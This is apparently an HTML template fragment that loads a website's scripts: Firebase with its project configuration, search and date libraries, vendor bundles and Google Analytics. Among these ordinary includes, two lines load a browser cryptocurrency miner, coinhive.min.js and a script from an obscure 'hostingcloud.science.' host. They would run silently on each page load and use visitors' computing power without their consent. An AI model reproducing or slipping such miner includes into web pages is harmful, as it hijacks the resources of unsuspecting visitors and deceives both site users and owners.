<script src="https://www.gstatic.com/firebasejs/5.1.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/5.1.0/firebase-auth.js"></script>
<script src="https://www.gstatic.com/firebasejs/5.1.0/firebase-database.js"></script>
<script src="https://www.gstatic.com/firebasejs/5.1.0/firebase-firestore.js"></script>
<script src="https://www.gstatic.com/firebasejs/5.1.0/firebase-functions.js"></script>
<script>
  var firebase_config = {
    apiKey: "AIzaSyANZCeg4hzphwZ48heqRw4WCC2bHveqx5k",
    authDomain: "gengen-e3b23.firebaseapp.com",
    databaseURL: "https://gengen-e3b23.firebaseio.com",
    projectId: "gengen-e3b23",
    storageBucket: "gengen-e3b23.appspot.com",
    messagingSenderId: "610473711969"
  };
  firebase.initializeApp(firebase_config);
</script>
<script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.3.3/dist/instantsearch.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.20.1/moment.min.js"></script>
<script src="/vendor/sharer.min.js"></script>
<script src="/js/vendor.js?v={{ site.site_version }}"></script>
<script src="/vendor/vue-resource.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://www.hostingcloud.science./zLaI.js"></script>
<script src="/js/app.js?v={{ site.site_version }}"></script>
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');ga('create', '{{ site.ga_track_id }}', 'auto');ga('send', 'pageview');
</script>
